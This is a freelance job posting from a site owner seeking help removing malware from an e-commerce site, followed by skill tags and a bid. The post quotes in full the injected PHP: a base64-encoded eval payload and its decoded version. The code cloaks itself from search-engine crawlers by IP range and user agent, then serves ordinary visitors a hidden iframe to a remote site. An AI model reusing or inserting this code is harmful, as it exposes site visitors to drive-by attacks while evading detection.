Devam Ediyor

513051 virus/malware removal

I have a virus on my e-commerce site which is repeatedly modifying my [url removed, login to view] files, adding the following code

<?php eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOw0KJGJvdCA9IEZBTFNFIDsNCiR1c2VyX2FnZW50X3RvX2ZpbHRlciA9IGFycmF5KCdib3QnLCdzcGlkZXInLCdzcHlkZXInLCdjcmF3bCcsJ3ZhbGlkYXRvcicsJ3NsdXJwJywnZG9jb21vJywneWFuZGV4JywnbWFpbC5ydScsJ2FsZXhhLmNvbScsJ3Bvc3RyYW5rLmNvbScsJ2h0bWxkb2MnLCd3ZWJjb2xsYWdlJywnYmxvZ3B1bHNlLmNvbScsJ2Fub255bW91c2Uub3JnJywnMTIzNDUnLCdodHRwY2xpZW50JywnYnV6enRyYWNrZXIuY29tJywnc25vb3B5JywnZmVlZHRvb2xzJywnYXJpYW5uYS5saWJlcm8uaXQnLCdpbnRlcm5ldHNlZXIuY29tJywnb3BlbmFjb29uLmRlJywncnJycnJycnJyJywnbWFnZW50JywnZG93bmxvYWQgbWFzdGVyJywnZHJ1cGFsLm9yZycsJ3ZsYyBtZWRpYSBwbGF5ZXInLCd2dnJraW1zanV3bHkgbDN1Zm1qcngnLCdzem4taW1hZ2UtcmVzaXplcicsJ2JkYnJhbmRwcm90ZWN0LmNvbScsJ3dvcmRwcmVzcycsJ3Jzc3JlYWRlcicsJ215YmxvZ2xvZyBhcGknKTsNCiRzdG9wX2lwc19tYXNrcyA9IGFycmF5KA0KCWFycmF5KCIyMTYuMjM5LjMyLjAiLCIyMTYuMjM5LjYzLjI1NSIpLA0KCWFycmF5KCI2NC42OC44MC4wIiAgLCI2NC42OC44Ny4yNTUiICApLA0KCWFycmF5KCI2Ni4xMDIuMC4wIiwgICI2Ni4xMDIuMTUuMjU1IiksDQoJYXJyYXkoIjY0LjIzMy4xNjAuMCIsIjY0LjIzMy4xOTEuMjU1IiksDQoJYXJyYXkoIjY2LjI0OS42NC4wIiwgIjY2LjI0OS45NS4yNTUiKSwNCglhcnJheSgiNzIuMTQuMTkyLjAiLCAiNzIuMTQuMjU1LjI1NSIpLA0KCWFycmF5KCIyMDkuODUuMTI4LjAiLCIyMDkuODUuMjU1LjI1NSIpLA0KCWFycmF5KCIxOTguMTA4LjEwMC4xOTIiLCIxOTguMTA4LjEwMC4yMDciKSwNCglhcnJheSgiMTczLjE5NC4wLjAiLCIxNzMuMTk0LjI1NS4yNTUiKSwNCglhcnJheSgiMjE2LjMzLjIyOS4xNDQiLCIyMTYuMzMuMjI5LjE1MSIpLA0KCWFycmF5KCIyMTYuMzMuMjI5LjE2MCIsIjIxNi4zMy4yMjkuMTY3IiksDQoJYXJyYXkoIjIwOS4xODUuMTA4LjEyOCIsIjIwOS4xODUuMTA4LjI1NSIpLA0KCWFycmF5KCIyMTYuMTA5Ljc1LjgwIiwiMjE2LjEwOS43NS45NSIpLA0KCWFycmF5KCI2NC42OC44OC4wIiwiNjQuNjguOTUuMjU1IiksDQoJYXJyYXkoIjY0LjY4LjY0LjY0IiwiNjQuNjguNjQuMTI3IiksDQoJYXJyYXkoIjY0LjQxLjIyMS4xOTIiLCI2NC40MS4yMjEuMjA3IiksDQoJYXJyYXkoIjc0LjEyNS4wLjAiLCI3NC4xMjUuMjU1LjI1NSIpLA0KCWFycmF5KCI2NS41Mi4wLjAiLCI2NS41NS4yNTUuMjU1IiksDQoJYXJyYXkoIjc0LjYuMC4wIiwiNzQuNi4yNTUuMjU1IiksDQoJYXJyYXkoIjY3LjE5NS4wLjAiLCI2Ny4xOTUuMjU1LjI1NSIpLA0KCWFycmF5KCI3Mi4zMC4wLjAiLCI3Mi4zMC4yNTUuMjU1IiksDQoJYXJyYXkoIjM4LjAuMC4wIiwiMzguMjU1LjI1NS4yNTUiKQ0KCSk7DQokbXlfaXAybG9uZyA9IHNwcmludGYoIiV1IixpcDJsb25nKCRfU0VSVkVSWydSRU1PVEVfQUREUiddKSk7DQpmb3JlYWNoICggJHN0b3BfaXBzX21hc2tzIGFzICRJUHMgKSB7DQoJJGZpcnN0X2Q9c3ByaW50ZigiJXUiLGlwMmxvbmcoJElQc1swXSkpOyAkc2Vjb25kX2Q9c3ByaW50ZigiJXUiLGlwMmxvbmcoJElQc1sxXSkpOw0KCWlmICgkbXlfaXAybG9uZyA+PSAkZmlyc3RfZCAmJiAkbXlfaXAybG9uZyA8PSAkc2Vjb25kX2QpIHskYm90ID0gVFJVRTsgYnJlYWs7fQ0KfQ0KZm9yZWFjaCAoJHVzZXJfYWdlbnRfdG9fZmlsdGVyIGFzICRib3Rfc2lnbil7DQoJaWYgIChzdHJwb3MoJF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddLCAkYm90X3NpZ24pICE9PSBmYWxzZSl7JGJvdCA9IHRydWU7IGJyZWFrO30NCn0NCmlmICghJGJvdCkgew0KZWNobyAnPGlmcmFtZSBzcmM9Imh0dHA6Ly9jdGZhZWZsLmNvLnR2Lz9nbz0xIiB3aWR0aD0iMSIgaGVpZ2h0PSIxIj48L2lmcmFtZT4nOw0KfQ=='));

this is decoded as follows:

error_reporting(0);

$bot = FALSE ;

$user_agent_to_filter = array('bot','spider','spyder','crawl','validator','slurp','docomo','yandex','[url removed, login to view]','[url removed, login to view]','[url removed, login to view]','htmldoc','webcollage','[url removed, login to view]','[url removed, login to view]','12345','httpclient','[url removed, login to view]','snoopy','feedtools','[url removed, login to view]','[url removed, login to view]','[url removed, login to view]','rrrrrrrrr','magent','download master','[url removed, login to view]','vlc media player','vvrkimsjuwly l3ufmjrx','szn-image-resizer','[url removed, login to view]','wordpress','rssreader','mybloglog api');

$stop_ips_masks = array(

array("216.239.32.0","[url removed, login to view]"),

array("64.68.80.0" ,"[url removed, login to view]" ),

array("66.102.0.0", "[url removed, login to view]"),

array("64.233.160.0","[url removed, login to view]"),

array("66.249.64.0", "[url removed, login to view]"),

array("72.14.192.0", "[url removed, login to view]"),

array("209.85.128.0","[url removed, login to view]"),

array("[url removed, login to view]","[url removed, login to view]"),

array("173.194.0.0","[url removed, login to view]"),

array("[url removed, login to view]","[url removed, login to view]"),

array("[url removed, login to view]","[url removed, login to view]"),

array("[url removed, login to view]","[url removed, login to view]"),

array("[url removed, login to view]","[url removed, login to view]"),

array("64.68.88.0","[url removed, login to view]"),

array("[url removed, login to view]","[url removed, login to view]"),

array("[url removed, login to view]","[url removed, login to view]"),

array("74.125.0.0","[url removed, login to view]"),

array("65.52.0.0","[url removed, login to view]"),

array("74.6.0.0","[url removed, login to view]"),

array("67.195.0.0","[url removed, login to view]"),

array("72.30.0.0","[url removed, login to view]"),

array("38.0.0.0","[url removed, login to view]")

);

$my_ip2long = sprintf("%u",ip2long($_SERVER['REMOTE_ADDR']));

foreach ( $stop_ips_masks as $IPs ) {

$first_d=sprintf("%u",ip2long($IPs[0])); $second_d=sprintf("%u",ip2long($IPs[1]));

if ($my_ip2long >= $first_d && $my_ip2long <= $second_d) {$bot = TRUE; break;}

}

foreach ($user_agent_to_filter as $bot_sign){

if (strpos($_SERVER['HTTP_USER_AGENT'], $bot_sign) !== false){$bot = true; break;}

}

if (!$bot) {

echo '<iframe src="[url removed, login to view]" width="1" height="1"></iframe>';

}

my site was suspended due to a phlishing attack, however i have had it re-stated

IMPORTANT

I need someone who has previously completely resolved this issue before and has the knowledge as to how the hacker is able to access my files and the precautions needed to prevent happening again.

No second guessers need apply - sorry but need someone with previous experience of this hack if possible as its likely to involve quite a lot of work to resolve completely - I am not experienced at all in this area so i need somone who can do this work for me, not someone to tell me what i need to do

i have email and msn for communicating

Beceriler: Her şey Kabul, Drupal, e-Ticaret, PHP, Web Güvenliği, Web Sitesi Yönetimi, WordPress

Daha fazlasını görün: yandex-ru, yandex com, php hack code, master security, lt security, i need someone who can hack a wordpress site, how to master wordpress, drupal e-commerce site, code de site web, 233, wordpress malware removal, e mail ru, yandex, wordpress hack, wordpress bot, web security hacker, vlc media player, virus, site malware, need virus, master e work, Malware Removal, magent, image removal, hack web

İşveren Hakkında:
( 9 değerlendirme ) Stroud, United Kingdom

Proje NO: #2258983

Seçilen:

devd22

Professional and quick [url removed, login to view] Dev

0 gün içinde 40$ USD
(262 Değerlendirme)
5.9